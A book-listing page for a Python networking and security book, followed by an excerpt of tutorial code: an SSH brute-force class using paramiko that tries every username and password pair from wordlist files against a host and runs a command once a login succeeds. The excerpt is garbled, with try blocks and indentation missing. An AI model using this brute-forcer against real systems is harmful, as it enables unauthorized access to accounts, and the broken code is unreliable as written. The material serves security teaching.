Mastering Python for Networking and Security by José Manuel Ortega
Author:José Manuel Ortega
Language: eng
Format: epub, mobi
Tags: COM043050 - COMPUTERS / Security / Networking, COM051360 - COMPUTERS / Programming Languages / Python, COM053000 - COMPUTERS / Security / General
Publisher: Packt Publishing
Published: 2018-09-28T06:08:54+00:00
class SSHConnection:
def __init__(self):
#ssh connection with paramiko library
self.ssh = paramiko.SSHClient()
def ssh_connect(self,ip,user,password,code=0):
print("[*] Testing user and password from dictionary")
print("[*] User: %s" %(user))
print("[*] Pass :%s" %(password))
except paramiko.AuthenticationException:
code = 1
except socket.error as e:
code = 2
return code
For the brute-force process, we can define one function that iterates over users' and passwords' files and tries to establish a connection with the ssh for each combination:
def startSSHBruteForce(self,host):
#open files dictionary
users_file = open("users.txt")
passwords_file = open("passwords.txt")
for user in users_file.readlines():
for password in passwords_file.readlines():
user_text = user.strip("\n")
password_text = password.strip("\n")
#check connection with user and password
response = self.ssh_connect(host,user_text,password_text)
if response == 0:
print("[*] User: %s [*] Pass Found:%s" %(user_text,password_text))
stdin,stdout,stderr = self.ssh.exec_command("ifconfig")
for line in stdout.readlines():
elif response == 1:
print("[*]Login incorrect")
elif response == 2:
print("[*] Connection could not be established to %s" %(host))
except Exception as e:
print("Error ssh connection")
#close files
except Exception as e:
print("users.txt /passwords.txt Not found")
Mastering Python for Networking and Security by José Manuel
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